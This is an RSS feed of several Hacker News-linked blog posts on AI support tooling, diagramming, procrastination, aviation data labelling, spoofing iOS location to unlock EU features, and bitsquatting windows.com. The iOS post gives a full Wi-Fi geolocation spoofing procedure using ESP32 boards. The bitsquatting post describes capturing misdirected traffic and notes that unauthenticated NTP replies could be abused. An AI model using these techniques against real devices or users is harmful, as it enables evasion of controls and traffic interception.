    4. We ask for help. If RunLLM can’t answer a question, it seamlessly loops in a person — logging unresolved issues, surfacing them in Slack, and learning from your answer.
    3. Insights That Surface What Matters — Clarifies Complexity

    RunLLM processes thousands of customer conversations each week. Buried in those interactions are valuable insights — but no team can manually sift through them all. That’s why RunLLM structures this data into clear, actionable insights, identifying patterns, surfacing key issues, and highlighting opportunities — whether for your team to act on or for RunLLM to handle automatically.

    We aim to proactively separate signal from noise. We start by automatically categorizing all questions by topic and generating brief summaries, so you don’t have to read hundreds of conversations per-topic. On top of that, we help you uncover customer use cases, track trends in user behavior, identify documentation gaps, and surface feature requests — all in a way that’s immediately actionable.

    4. A Capable AI Support Engineer — Shoulders the Work

    AI products are ultimately about delivering work so that you don’t have to. RunLLM is always working in the background — whether it’s to help your customers be successful or to help you understand what your customers are doing. This unlocks your time to focus on your highest value customer relationships.

    To make your customers successful, we don’t stop at a single answer. We look for alternatives, search the internet, and execute code — all with the goal of maximizing the likelihood that we solve the problem at hand. Simultaneously, we’re always looking for ways to help you improve. The insights mentioned above are periodically updated for you, and RunLLM will proactively flag documentation issues and suggest updates.

    In Pursuit of AI Magic

    When done well, AI can feel like magic. The best AI isn’t just useful — it’s intuitive, responsive, and even delightful. Few things make us happier than hearing a customer ask, “How did it figure that out?!”

    Of course, the answer isn’t magic — it’s thoughtful design, relentless iteration, and a deep focus on user experience. Creating seamless AI requires rethinking product design from the ground up and constantly refining how the system anticipates, adapts, and assists.

    We’ve learned a lot through this process, and we hope sharing these principles helps others think about what makes AI feel more natural, intuitive, and effective.

    And we’re just getting started — with more background data analysis, smarter suggestions, and even more proactive insights on the way.

    ]]>
    https://www.runllm.com/blog/the-hard-thing-about-building-ai-applications hacker-news-small-sites-43197656 Thu, 27 Feb 2025 19:35:59 GMT
    <![CDATA[What I Use to Make Diagrams]]> thread link) | @cubbic
    February 27, 2025 | https://cubbk.de/posts/drawio-vscode-plugin/ | archive.org

    There are tools like Miro and Lucidchart which are very good for making diagrams and have cool multiplayer (gen Z talk) features, but with 2 major drawbacks:

    • separate from code
    • not free

    The paid part can be ignored, even though it’s a pain to switch tools at every new company and to not be able to use them in personal projects, but the separation from code does not cut it for me.

    I’ve been using draw.io and exporting PNGs for quite a while, but recently I discovered a vscode plugin that fixed it all for me.

    Draw.io Integration

    A vscode plugin that lets you make a diagram.drawio.svg file (notice the .svg), edit it as a drawio diagram, and just save it back!

    It saves it as an svg without having to export anything, and it still contains the diagram embedded in the svg so it can be edited again! No more manual exports or sharing links to Miro!


    I like it and will continue using it further.

    Things to consider:

    • unofficial extension
    • there is multiplayer but much more annoying to set up
    • your manager/PO is likely not keen on installing any vscode extensions
    ]]>
    https://cubbk.de/posts/drawio-vscode-plugin/ hacker-news-small-sites-43197622 Thu, 27 Feb 2025 19:32:40 GMT
    <![CDATA[The False Summit – When 90% done becomes 50%]]> thread link) | @jermaustin1
    February 27, 2025 | https://jeremyaboyd.com/post/the-false-summit | archive.org

    A friend of mine is always calling me out for never finishing anything, and never writing anything, and never responding to him after 5 PM or on weekends. I'm a bad friend, and I have accepted that, but he's always asking me about whatever my latest hyperfixation project is. Did I finish it; did I write a post about it; did I release it to the app store. The questions are triggering because the answer is almost always "no".

    Why is it almost always no, though?

    I'm a BIG proponent of therapy, and not just because I paid untold thousands for my wife to get her masters in psychology. It has also helped me identify patterns in my behavior and where I developed them. Over my many years of therapy, I'm still searching for why I hate finishing things. And it's not just software projects, it is everything.

    I hate finishing book series, games, shows, movies, chores, etc. I hate it so much, I don't even start them a lot of the time. After nearly a decade in therapy, with this being a central recurring theme, I've decided to finally finish it.

    Why do I hate the end?

    I have a few theories, but I'm not sure at the time I'm writing this sentence if any of them are true.

    Hypothesis #1: I have finished everything. Now I have nothing to do. Why do I exist?

    Fuck... right out of the gate, existential dread. This is a real-time writing, I don't know the next word I'm going to type until I'm typing it. Does this feel true, though?

    If I 100% Skyrim (main and all side quests), would the game be re-playable? I honestly don't know. I would lose one of my favorite games if I learned everything (why I hate spoilers as well). I could see replaying some aspects, but unless I decide to go questless and just openworld it, the game would lose novelty and no longer be fun. I know the outcome.

    BUT - I have reread Harry Potter four or five times. So, that was re-readable, so Skyrim should be re-playable? I've replayed Skyrim dozens of times from the start, as well, but I usually get bored, so I will add something to my requirements (no ranged combat, or alteration only, or something dumb like no foraging, where everything has to be given or bought), and that keeps it fresh until I forget; then one break of my rules makes that save unplayable again.

    This seems plausible.

    Hypothesis #2: Nothing is ever done, so how can you finish, and if you can't finish something, why keep going?

    Ooof, this one hits even closer to home. One of the many projects I'm working on is to learn all this newfangled AI stuff, using LLMs and SLMs to build things beyond a chatbot... but also a chatbot. I haven't written about it because "it's not done and it keeps changing," but it is called DreamEngine - a "game engine" in C# that uses the OpenAI API (with structured output and tool calling) to let you build a simple game that uses a compatible LLM for your "game logic." It is a really fun project - some of the most fun I've had on a side project in a long time - but every time I think I'm done, I realize how much more I have left, and it kills my momentum.

    I call this the False Summit (I'm sure I didn't invent this). Any hikers or climbers out there know this problem well. I think I will even use this as the title for this post.

    When you think you are mere moments from summiting your Everest (or Pikes Peak, or Enchanted Rock, or DreamEngine), then another peak pops into view over the ridge you just crested. Your legs quiver, your body feels a new level of soreness.

    That is how I feel each time I play with DreamEngine. I write a small game in it, "A Trolley Through Time" (a game where each turn is a new decade from the 1850s until the 2020s, and you have to choose which historic figure gets crushed on the tracks, altering history) - really fun to play, and the reason I built DreamEngine. Everything is great.

    Then I think to myself, well, what about a more open-ended RPG game? As I create the game, I realize I need to add tool calling, so that was my first false summit. And since the engine code was pretty coupled to the game, I had to extract it and make it more generic - another summit. Then I realized the RPG needed more complex structured output than a simple single-layer JSON object - another summit.

    Each summit swipes 1 energy from your max; after so many of them, you can't even regain enough energy to continue, and you are now camping.

    Hypothesis #3: ADHD?

    Almost everyone I know has been diagnosed with ADHD. I have watched their lives get turned around by the proper dosing of meth. They do more and are more productive, but all the ADHD symptoms are still there. Also, I don't have a problem finishing work if it is REAL work, and I'm getting paid for it.

    I've always dismissed having ADHD because I'm an incredibly productive software developer... at work. I close more tickets, produce fewer bugs, and finish things in a week that another developer would take months on. I am not a 10x or anything like that, I just work in corporate America where the expectations are way lower, and I hate doing nothing. So while on the clock, I work and finish things.

    That has always told me I don't have ADHD, but now, as I get older, I find myself more easily distracted. I used to be able to sit at my desk for up to 72 hours (only leaving for bathroom breaks or the vending machine) until I was DONE with something, but now I find myself getting up just to pace every hour or so. Also, I used to use YouTube as background noise, and now I catch myself watching YouTube, not just listening.

    I am kind of wondering if maybe I do have ADHD, and I was just able to utilize it in my youth, whereas now I'm actively having to fight against it.

    So WTF is it?

    At the risk of sounding cliché, all of them? They each make sense to describe a portion of whatever prevents me from finishing things. I still cry at the end of Harry Potter, not because anyone dies, or because anything particularly emotional happens (it does, of course), but because it is over, and rereading it will take me multiple months with the amount of time I have allocated to read, so that is sad. I hate watching Michael Scott move to Colorado, not because it is sad (though it is), but because the Office is over (and we all know it).

    I hate thinking I'm almost done with something, then realizing I'm nowhere close. And at work, a defined scope makes that easier to deal with, but on a personal project without a PM and a BA managing scope, there is no scope, and when there is no scope, there is never an end. In hiking, I actually like false summits, though, because I also hate ending my hike (ties back to #1).

    And, I'm starting to think I have ADHD... and that is what allowed me to hyperfocus on a work task until it was done in my youth, because everything back then was novel, and now that I've done everything (a corporate developer would ever do), the lack of novelty makes it hard to sit for more than a couple of hours without needing a mental break (or having one).

    Is there a solution?

    Maybe? I don't know.

    One could say finishing something might be exposure therapy: do it enough and reframe it as a success and not a loss.

    Possibly creating some coping mechanisms like actually scoping a personal project, and releasing in smaller chunks, so I'm constantly finishing something... that would feed into the exposure therapy.

    For ADHD, there are a lot of coping mechanisms for unmedicated success. ADHD workbooks exist, but everyone is different, and we all have different motivations, so finding the thing that motivates you is what would lead to the most success.

    What about you, reader?

    Does this resonate with you? Do you have similar struggles?

    ]]>
    https://jeremyaboyd.com/post/the-false-summit hacker-news-small-sites-43197514 Thu, 27 Feb 2025 19:20:19 GMT
    <![CDATA[Who Did the Work?]]> thread link) | @jger15
    February 27, 2025 | https://quarter--mile.com/Who-Did-The-Work | archive.org

    Unable to extract article]]>
    https://quarter--mile.com/Who-Did-The-Work hacker-news-small-sites-43197447 Thu, 27 Feb 2025 19:12:55 GMT
    <![CDATA[Our data labelling was too complex to outsource]]> thread link) | @EricButton
    February 27, 2025 | https://www.ericbutton.co/p/data-labelling | archive.org

    At Enhanced Radar, we’ve developed Yeager, a SOTA model that understands air traffic control audio, and we continue to develop other AI models for aviation applications. Due to the industry-specific technical complexity of our data, we could not possibly outsource this labelling effort to a third party and still meet our quality standards, forcing us to label our data in-house.

    Looking back, our decision to control our own labelling was vindicated at every step. The iterative process of building our labelling engine was the result of 1:1 relationships with our hundreds of (domain expert) reviewers, thousands of emails, and dozens of internal product updates, that now allow us to label a huge volume of messy data at a high degree of standardization and near-perfect accuracy — all with minimal intervention.

    Obvious but necessary: to incentivize productive work, we tie compensation to the number of characters transcribed, and assess financial penalties for failed tests (more on tests below). Penalties are priced such that subpar performance will result in little to no earnings for the labeller.

    Speed translates to cost savings, so we optimize for it at the expense of aesthetics. The interface presents the user with a single audio clip, pre-transcribed by one of our models.

    All text in the text area is forced-uppercase, freeing the user from making judgements on capitalization, or reaching for the shift key.

    All buttons in the dashboard are given (and labelled with) a keyboard shortcut, and the critical ones are oversized, color-coded, and placed directly below the text field.

    An audio waveform and playhead are shown, allowing the user to quickly replay specific parts of a clip he may have questions about. Clicking on the waveform will cause the clip to start playing even if the audio has been paused.

    Subsequent audio clips are pre-fetched, allowing a new clip to load instantly after the previous one is submitted.

    Every effort at gamification has been rewarded beyond our expectations. (Don’t assume that someone who’s intelligent and self-motivated won’t respond to stimuli.)

    All of our contractors are skilled and most have well-paying day jobs, resulting in their time on the platform carrying a higher opportunity cost than most data labellers’. For this reason we designed every aspect of the platform to treat the users with respect. We address our labellers as “reviewers,” which more accurately describes the high-skill process they’re tasked with. We also take care to never make a rule, give an instruction, penalize a user, or push a platform update without thoroughly explaining the “why” behind it — doing otherwise would be disrespectful.

    To maximize gamification and to give us future flexibility for adjusting our payscale, reviewers earn points which are convertible to dollars at an agreed-upon rate. One point is earned for every character transcribed. For the average clip, a reviewer will earn approximately 50 points, which we add to a running tally at the top of the interface. We animate this number increase using Odometer, and display dollar earnings next to the points tally.

    Each reviewer is tested for accuracy at random. For every test passed, the user is shown a shower of confetti; for every failed test, the user is shown a text diff to help them correct their failed test.

    The reviewer’s accuracy is shown at the top of the interface, and updates in real-time. To encourage speedy remediation, the accuracy shown is calculated from just their last 200 tests.

    New reviewers are given a 1000-point credit to start; this helps them avoid seeing negative points (and negative earnings) in case they fail several tests in their first minutes of using the platform, and increases Day 1 retention.

    Reviewers are paid weekly, to tighten the feedback loop between effort and reward.

    Our first challenge was maintaining labeller performance.

    Every reviewer is presented with a number of test clips, ranging from 10-30% of the clips they see, based on their accuracy track record. Failing a test will cost a user 600 points, or roughly the equivalent of 15 minutes of work on the platform. A correctly tuned penalty system removes the need for setting reviewer accuracy minimums; poor performers will simply not earn enough money to continue on the platform.
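
    To make the incentive math concrete, here’s a rough sketch (the point values are the ones described above; the dollar-per-point rate shown is a made-up placeholder, not our actual rate):

    POINTS_PER_CHAR = 1        # one point per character transcribed
    TEST_PENALTY = 600         # points lost per failed test (~15 minutes of work)
    DOLLARS_PER_POINT = 0.001  # hypothetical conversion rate

    def weekly_earnings(chars_transcribed: int, failed_tests: int) -> float:
        points = chars_transcribed * POINTS_PER_CHAR - failed_tests * TEST_PENALTY
        return max(points, 0) * DOLLARS_PER_POINT

    # An accurate reviewer doing 400 ~50-character clips with 2 failed tests:
    print(weekly_earnings(400 * 50, 2))   # 18800 points
    # A sloppy reviewer failing 30 tests earns almost nothing:
    print(weekly_earnings(400 * 50, 30))  # 2000 points

    Tuned this way, accuracy and earnings rise and fall together, which is the whole point.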

    Due to the technical nature of our audio data, each of our labellers is required to have meaningful air navigation experience in U.S. airspace. All labellers are either licensed pilots or controllers (or VATSIM pilots/controllers).

    Still, expert reviewers will occasionally disagree in their labelling. To ensure quality, an audio clip ██████ ██████ ██ ██ ███████ █████████ █ ████ █████ ████ ████████ ███████ ███ █ ██ █████ ██ ███████, at which point that clip becomes a “candidate”. From there, this candidate clip is sent to a manager for final review. Managers are reviewers with a track-record for exceptional judgement, who can change the status of a clip from “candidate” to “final”.

    Finalized clips are then ready for use in AI training, but are also used as test clips. As each normal audio clip is presented to the user with an AI-generated “pre-transcription,” test clips must be disguised by showing an imperfect transcript for the user to correct. For every test, we use a small LLM to generate a slightly “wrong” transcript to present to the user.

    To maintain reviewer trust, we allow users to “dispute” a failed test and provide a one-sentence explanation for their reasoning. This dispute is viewed by a manager, who can choose to accept the dispute, reject it, or classify as ambiguous. For accepted or ambiguous disputes, the reviewer’s point penalty is reversed and that reviewer is notified in their dashboard. Clips where two domain experts can be reasonably expected to disagree on their interpretation are marked as “ambiguous”; these are removed from the test pool, and can be deleted from the training set entirely if the ambiguity risks adding noise to our dataset.

    Conveniently, the “dispute a failed test” functionality also doubles as the nth set of eyes on a given audio clip. Disputed clips are sent to a qualified manager for a final decision. As we add new data sources, reviewer disputes give us critical feedback on standardizations to implement; often, a new airport environment introduces a number of rare-but-critical phrases or words that we must standardize or add to our spell-check/grammar-check.

    Manager quality is measured independently, on several metrics.

    Standardization of interpretation of the speech is critical for model performance, and for fairly measuring each reviewer’s accuracy. While our reviewer vetting, training, and guidelines do most of the work, we still customize our UI for this.

    Reviewers are unable to submit a transcript containing a known spelling or grammatical error. We use a spell-check customized for aviation communications (an off-the-shelf spell-check would reject “DUYET,” a real navigational fix just southeast of SFO, for example). Similarly, we customize our spell check to accept only one version of words that can be spelled correctly in multiple ways, such as “all right” / “alright,” or “OK” / “okay.”
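
    The gist of that customization can be sketched in a few lines of Python (the word lists and file name here are illustrative, not our actual dictionaries):

    # Base English dictionary plus an aviation whitelist (fixes, callsigns, etc.)
    BASE_DICT = {w.strip().upper() for w in open("english_words.txt")}
    AVIATION_TERMS = {"DUYET", "LAAYK", "AIRFRANS"}
    PREFERRED = {"ALRIGHT": "ALL RIGHT", "OKAY": "OK"}  # one accepted spelling

    def check(transcript: str) -> list[str]:
        """Return problems blocking submission; an empty list means it can be submitted."""
        problems = []
        for word in transcript.upper().split():
            if word in PREFERRED:
                problems.append(f"use '{PREFERRED[word]}' instead of '{word}'")
            elif word not in AVIATION_TERMS and word not in BASE_DICT:
                problems.append(f"unknown word: '{word}'")
        return problems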

    Reviewers who fail a test are required to fix and re-submit their answer, to reinforce their understanding of our standards.

    A large percentage of aviation communications reference proper nouns, such as “JetBlue 2313,” “LAAYK” (a navigational fix), or “runway one six right.” Further, many navigational fixes are made-up words whose spelling often can’t be derived from their pronunciation. Callsigns present a similar issue (Air France’s call sign is “AIRFRANS,” for example).

    To address this we collect airspace metadata at the time of audio capture, including the callsigns of all nearby aircraft, the names of all nearby navigational aids, and the runway configuration for terminal area audio data. We present this data below the transcript so the reviewer can verify the spelling of these words.

    As we continue to develop the best AI models for aviation command & control, we’re only accelerating our effort in building the things that build the things for us. Recently we’ve built a lot more to improve our labelling and the fidelity of our annotation, but we’ll discuss that a year or two from now.

    One final thought: if you’re not a foundational AI research company and you can outsource your data labelling to anonymous gig workers on another continent, do you even have a data advantage? Do you have a Process Power advantage?

    ]]>
    https://www.ericbutton.co/p/data-labelling hacker-news-small-sites-43197248 Thu, 27 Feb 2025 18:53:44 GMT
    <![CDATA[Accessing region-locked iOS features, such as EU app stores]]> thread link) | @todsacerdoti
    February 27, 2025 | https://downrightnifty.me/blog/2025/02/27/eu-features-outside.html | archive.org

    The European Union's Digital Markets Act obligates Apple to provide certain features to iOS users in the EU, such as third party app stores. I live in the US and was able to develop a relatively straightforward method to spoof your location on iOS and access these features, as well as any other region-locked iOS features you might be interested in experimenting with, even if you aren't in the required region.

    If you look at the reverse engineered documentation, it would seem to be difficult to fool Apple's countryd service, since it uses almost all available hardware radios to determine your location – GPS, Wi-Fi, Bluetooth, and cellular. However, Apple has developed a "priority" system, roughly ranking the relative reliability of each location determination method. Since Location Services has the highest priority value, if it returns a location result, the results from the other methods seem to be ignored. Location Services relies solely on GPS and nearby Wi-Fi access points if Airplane Mode is enabled (and Wi-Fi re-enabled). Therefore, if you can spoof Wi-Fi geolocation (or if you can spoof GPS), then you can access region-locked features from anywhere, even on the iPhone with its wide array of radios.

    On non-cellular iPad models, it has the potential to be even easier, because they only use Location Services (which can be disabled), or Wi-Fi country codes (which can be trivially spoofed). I was able to get this spoofing method working as well. However, it's not covered here.

    I tested this with:

    • 2 ESP32 units creating 25 spoofed networks each (total 50)
    • iOS 18.2.1 on an iPhone 15, and an iPad Mini 6th gen

    I was amazed at how consistent and reliable spoofing is, especially accounting for the low cost of the hardware involved and the simplicity of the spoofing software and method.

    Most of the work was already done by Lagrange Point and Adam Harvey, developer of the Skylift tool. I was inspired by Lagrange Point's article to experiment with this and to reproduce their results. Check out their article on enabling Hearing Aid mode on AirPods in unsupported regions!

    Please note that Apple could make the checks more difficult to bypass in the future through iOS updates. They don't have much of a reason to, since the current system is most likely more than sufficient to deter the average user from doing this, but it's very possible.


    Procedure

    What you'll need

    • Some experience with the command line
    • An iOS/iPadOS device with a USB-C port (recent iPads, or iPhone 15+)
      • You might be able to make it work on a Lightning iPhone, but it's much easier with a USB-C port + hub
    • A USB-C hub with Ethernet, HDMI out, and several USB ports
    • A USB keyboard and mouse
    • A USB-C extension cable
    • A display with HDMI input
    • One or two "faraday pouches"; make sure one is large enough to hold your device, and if buying a second make sure it's large enough to hold the other one
      • Any other faraday cage setup allowing only the tip of a single USB-C cable to break through the cage will work too, but these pouches make it easy
      • In my testing, using two pouches did reduce the number of external Wi-Fi networks appearing on the Wi-Fi list to zero, but I was still able to make it work with only one pouch – WMMV
    • A router that you can install a VPN on
      • You'll need to plug the router directly in to the device via an Ethernet cable, so a secondary/portable router is preferred
    • Access to a VPN service with an option to place yourself in an EU country
    • One or more ESP32 dev modules (preferably at least two)
    • A small battery power supply for the ESP32 modules (a small USB power bank works)
    • A free WiGLE account

    These instructions assume you're using a Unix shell, so you might have to modify some of the commands slightly if you're on Windows.

    Preparing the router

    1. Install a VPN on your router placing you in your chosen target country.
    2. Select an EU member state supported by your VPN as a spoof target. I chose the Netherlands.

    Preparing the device

    Creating a secondary Apple ID

    You can't easily change the region on your Apple ID, and you probably don't want to do that anyway. But you can create a secondary Apple ID for use only while your device thinks that it's in the EU.

    1. Enable Airplane Mode and disable Bluetooth and Wi-Fi.
    2. Connect the device to the USB-C hub, and the USB-C hub to the router via Ethernet.
    3. Change your device region to your target country in Settings → General → Language & Region → Region.
    4. Sign out of your Apple ID: Settings → Your Account → Sign Out.
      • You'll need to sign out completely (including iCloud) in order to create a new account. Your data will not be lost. When you switch accounts again in the future, you only need to sign out of the App Store ("Media & Purchases"), not iCloud as well.
    5. Create a new Apple ID.
      • You can use the same phone number that's attached to your other Apple ID, or a Google Voice number.
      • For email, you'll need to either create an iCloud email, or use a "plus-style address".
    6. Make sure the Apple ID region is correct: App Store → Your Account → Your Account → Country/Region.
    7. Install at least one free app from the App Store to initialize the account.

    Getting Wi-Fi data

    1. Find a popular indoor public attraction offering free Wi-Fi within the target country using Google Maps or similar software. I chose the Rijksmuseum. Note down the GPS coordinates of the center of the building.
    2. Imagine a rectangle surrounding the building and note down the GPS coordinates of the top-left and bottom-right points.
    3. Create a free account on WiGLE.
    4. Query the WiGLE database using the online API interface with these parameters:
      1. latrange1: lesser of two latitudes you noted
      2. latrange2: greater of two latitudes you noted
      3. longrange1: lesser of two longitudes you noted
      4. longrange2: greater of two longitudes you noted
      5. closestLat: latitude of center of building
      6. closestLong: longitude of center of building
      7. resultsPerPage: 25*n where n is the number of ESP32 units you have (e.g. 50 for 2 units)
    5. Execute the request, then download the response as JSON (see the scripted alternative after this list)
    6. Clone the skylift repository:
      git clone https://github.com/DownrightNifty/skylift
      
    7. Set up skylift:
      cd skylift/
      python3 -m venv .venv
      source .venv/bin/activate
      pip install -r requirements.txt
      pip install setuptools
      python setup.py develop
      
    8. Convert the JSON data to the format used by skylift:
      # replace $PATH_TO_JSON, $TARGET_LAT, and $TARGET_LONG
      python ./extras/wigle_to_skylift.py $PATH_TO_JSON ./w2s_out $TARGET_LAT $TARGET_LONG
      
    9. Create the arduino sketch(es):
      c=1
      for file in ./w2s_out/*; do
          skylift create-sketch -i "$file" -o ./out_"$c" --max-networks 25 --board esp32
          ((c++))
      done
      
    10. Use the Arduino IDE to upload each sketch to each ESP32 unit.
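
    If you'd rather script steps 4-5 than click through the web interface, something like the following should work against WiGLE's v2 search API (a sketch: the endpoint and parameter names come from WiGLE's public API documentation, the coordinates below are a rough rectangle around the Rijksmuseum, and the credentials are the API name/token pair from your WiGLE account page):

    import requests

    params = {
        "latrange1": 52.358, "latrange2": 52.361,      # bounding rectangle
        "longrange1": 4.883, "longrange2": 4.887,
        "closestLat": 52.3600, "closestLong": 4.8852,  # center of the building
        "resultsPerPage": 50,                          # 25 * number of ESP32 units
    }
    resp = requests.get(
        "https://api.wigle.net/api/v2/network/search",
        params=params,
        auth=("YOUR_API_NAME", "YOUR_API_TOKEN"),
    )
    resp.raise_for_status()
    with open("wigle.json", "w") as f:
        f.write(resp.text)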

    Pre-generated Wi-Fi data

    If you're having trouble acquiring the data yourself, you could try using the sample data that I generated. If a large number of people start using it, I don't know if it will continue to work indefinitely, so please use your own data if possible.

    The sample data can be found under the generated/ directory in my fork of Skylift.

    Placing the device in the faraday pouch

    1. Before you continue, check the device's settings:
      1. Enable Airplane Mode, disable Bluetooth, and re-enable Wi-Fi.
      2. [Optional] Disable your lock screen (this makes controlling the device externally easier).
      3. [Optional] Make sure Apple Maps is allowed to access your location "while using the app": Settings → Privacy & Security → Location Services → Maps. Required because ask-for-permission prompts annoyingly don't appear on external displays.
      4. [iPhone only] Enable AssistiveTouch: Settings → Accessibility → Touch → AssistiveTouch. Required to enable mouse support on iPhone.
      5. Make sure you're signed in to the App Store with the EU Apple ID you created earlier: Settings → Your Account → Media & Purchases. Signing in to iCloud as well is unnecessary.
    2. Connect the USB-C extension cable to the device.
    3. [⚠️ Important] Insulate the ESP32 units from the metallic faraday pouch using plastic bags or something.
    4. Connect the ESP32 units to the battery.
    5. Place the device into a faraday pouch, along with the ESP32 units and their battery. Seal it as well as possible with only the tip of the cable sticking out (reducing its ability to let in radio signals).
      • If one pouch doesn't work, try using two pouches (placing one inside the other)
    6. Connect the USB-C hub to the cable. Connect the router via Ethernet, and a keyboard, mouse, and display via HDMI.

    Spoofing location and unlocking EU features

    Your iOS device should now only see the spoofed Wi-Fi networks, and cannot receive a GPS signal. Since we have a cable sticking out, this isn't a perfect faraday cage and it's possible that especially strong signals such as cell signals will make their way through, but that's okay.

    1. Make sure that you can control the device inside the faraday pouch using the connected keyboard, mouse, and display, and that the device has internet access through Ethernet.
    2. [Optional] Check the nearby Wi-Fi list to make sure you can only see fake Wi-Fi networks.
      • If you see one or two nearby networks, that should still be okay; the geolocation service seems to ignore irregularities like this and returns the most likely location result, considering all nearby networks.
      • 5GHz Wi-Fi is stronger than 2.4GHz. You could temporarily disable 5GHz on your main router if that helps.
    3. Disable Location Services and then re-enable it.
    4. Open Apple Maps and check to make sure it places you inside your target country.
    5. You should now have access to EU features such as third party app stores. Try installing AltStore PAL at: https://altstore.io/download

    If it doesn't work the first time around, disable Location Services and re-enable it, then try again.

    Caveats

    "Third party app stores" != "sideloading"

    I've written at length about why third party app stores aren't the same as "sideloading". Check out my new project, "Does iOS have sideloading yet?", below!

    https://www.doesioshavesideloadingyet.com/

    The 30 day grace period

    Once you take your device out of the faraday pouch and it realizes that it's no longer in the EU, a 30-day grace period begins during which you can use EU features freely. After the grace period, certain features will become restricted. You'll still be able to use any apps from alternative app stores you downloaded, but they'll no longer receive updates.

    However, you can simply repeat the location spoof process again once each month, if you want to continue to access these features.

    Acknowledgements

    Appendix: Notes on Apple's Eligibility system

    Apple's Eligibility system has been mostly reverse engineered and documented, but I wanted to add some of my notes here for future reference.

    As noted in the Lagrange Point article, you can monitor the activity of the eligibility service by monitoring the device's system logs, either through Console.app on macOS, or libimobiledevice on other platforms. This command is especially helpful:

    idevicesyslog | grep RegulatoryDomain
    

    Here's a sample output:

    Here are the different location estimate methods, sorted by priority from lowest to highest:

    • WiFiAP (1): Uses the two-digit country codes of nearby Wi-Fi access points
    • ServingCellMCC (2): Uses the MCC code of the cell tower that the device is currently connected to(?)
    • NearbyCellsMCC (3): Uses the MCC codes of nearby cell towers
    • LatLonLocation (4): Uses coordinates from Location Services (GPS/Wi-Fi)

    According to the Apple Wiki article:

    countryd uses a mix of all signals to decide which country is the most likely physical location of the device.

    However, I found that, in practice, if conflicting information is available, countryd will simply use the estimate with the highest priority.
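
    As a toy illustration of that observed behavior (a sketch of the logic as I saw it, not Apple's actual code): whichever estimate carries the highest priority value wins outright.

    # Hypothetical conflicting inputs: cellular says US, Location Services says NL.
    estimates = {
        "WiFiAP": ("US", 1),
        "NearbyCellsMCC": ("US", 3),
        "LatLonLocation": ("NL", 4),
    }
    country, _ = max(estimates.values(), key=lambda e: e[1])
    print(country)  # NL: Location Services overrides the cellular estimates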

    ]]>
    https://downrightnifty.me/blog/2025/02/27/eu-features-outside.html hacker-news-small-sites-43197163 Thu, 27 Feb 2025 18:45:18 GMT
    <![CDATA[Bitsquatting Windows.com]]> thread link) | @fanf2
    February 27, 2025 | https://remyhax.xyz/posts/bitsquatting-windows/ | archive.org

    Earlier this month, I came back around to seriously considering an attempt at bitsquatting. While the prior link goes into great depth on the topic, I will attempt to give a very high level overview here:

    If this sort of thing interests you: I tend to do stuff like this weekly. Give me a follow @_mattata

    When you try to access a site by its domain, that domain is stored in the memory of your computer, device, whatever… in a structure that looks something like this.

    01110111011010010110111001100100011011110111011101110011
    windows

    Now let’s say that the computer is running too hot, a solar flare is happening, or a cosmic ray (very real thing) flips a bit on the computer.

    01110111011010000110111001100100011011110111011101110011
    whndows

    Oh no! Now the value stored in memory is whndows.com instead of windows.com! When the time comes to make a connection to that domain, what happens?

    nslookup whndows.com

    *** can’t find whndows.com: Non-existent domain

    The domain doesn’t resolve to an IP!


    In fact, out of the 32 valid domain names that are 1-bitflip away from windows.com, 14 were available for purchase! This is a rather odd occurrence, as usually these are bought up by a company like Microsoft to prevent their use for phishing attempts. So I bought them. All of them. For ~$126.

    (If you’re a verifiably responsible party, I’m more than happy to transfer ownership of the domains. Otherwise, I’ll just hold on to them and continue to sinkhole.)

    windnws.com windo7s.com windkws.com windmws.com winlows.com windgws.com wildows.com wintows.com wijdows.com wiodows.com wifdows.com whndows.com wkndows.com wmndows.com
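
    For reference, candidates like these can be enumerated with a few lines of Python (a sketch: it flips each bit of each character of "windows" and keeps only results that are valid DNS label characters):

    VALID = set("abcdefghijklmnopqrstuvwxyz0123456789-")

    def bitflips(label: str):
        for i, ch in enumerate(label):
            for bit in range(8):
                flipped = chr(ord(ch) ^ (1 << bit))
                if flipped in VALID and flipped != ch:
                    yield label[:i] + flipped + label[i + 1:]

    candidates = sorted(set(bitflips("windows")))
    print(len(candidates), candidates)  # includes 'whndows', 'wkndows', ...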

    Now we need to point these domains somewhere. So I rent a VPS and configure IPv4/IPv6, and create wildcard DNS entries to point to them.

    Wildcard DNS works so that if I create a wildcard record saying that anything under whndows.com points to 123.123.123.123, then someone requesting abc.xyz.whndows.com will still get the same 123.123.123.123 record as a reply. Due to the nature of this research dealing with bits being flipped, this allows me to capture any DNS lookup for a subdomain of windows.com where multiple bits have flipped.
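
    In zone-file terms, the setup is just two records per domain (a fragment sketch; the IP is the same placeholder used above):

    whndows.com.    IN  A  123.123.123.123
    *.whndows.com.  IN  A  123.123.123.123  ; any subdomain resolves here too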

    Once we have DNS configured, we use tshark to perform a packet capture on the public interface of our VPS and wait for something interesting to happen.

    Below is a short snippet of some interesting things that can be shared without uniquely indentifying any users.

    Usage of GreyNoise.io was key in helping to differentiate between opportunistic scanning and actual bitflip scenarios. Great product!

    NTP UDP port 123 time.windows.com

    UDP packets destined for port 123 attempting to set their computer clock using the Network Time Protocol (NTP). time.windows.com is the default NTP server configured for all Windows machines and they check for the time regularly. If they don’t succeed in getting the time, they try again, and again, and again.

    In total, over the course of 14 days, my server received 199,180 NTP client connections from 626 unique IP addresses.

    The NTP client on Windows has no inherent verification of authenticity, so there is nothing stopping a malicious person from telling all these computers that it's after 03:14:07 on Tuesday, 19 January 2038, wreaking unknown havoc as the memory storing the signed 32-bit integer for time overflows.

    As it turns out though, for ~30% of these computers doing that would make little to no difference at all to those users because their clock is already broken.

    Using the tshark filter “ntp.xmt” we can extract the Transmit Timestamp, which is the time that the computer thinks it is when it asks to update the time.

    tshark -r capture.pcap -T fields -e ntp.xmt -2 -R ntp.xmt | sort -u

    Sep 28, 1984 19:41:12.638290998 EDT
    Sep 28, 2012 11:59:42.976403314 EDT
    Sep 28, 2029 21:50:47.552079831 EDT
    Sep 28, 2100 18:13:09.180229791 EST
    Sep 29, 1975 08:36:52.200231052 EDT
    Sep 29, 1980 23:44:14.142299217 EDT
    Sep 29, 2036 11:54:11.410350275 EDT
    Sep 29, 2038 06:18:34.082394858 EDT
    Sep 29, 2046 16:00:00.102963544 EST
    Sep 29, 2050 06:39:18.880921186 EST
    Sep 29, 2074 07:31:58.701524704 EST
    Sep 30, 1999 00:29:32.120677896 EDT
    Sep 30, 2009 02:54:33.318870579 EDT
    Sep 30, 2049 00:14:59.396552253 EST
    Sep 30, 2075 13:56:14.492526678 EST
    Sep 30, 2081 01:56:58.477295064 EST
    

    HTTP TCP port 80 sg2p.w.s.windows.com

